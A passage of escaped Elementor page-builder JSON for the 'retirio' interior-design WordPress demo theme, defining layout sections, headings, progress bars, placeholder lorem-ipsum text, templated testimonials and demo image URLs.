ound_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 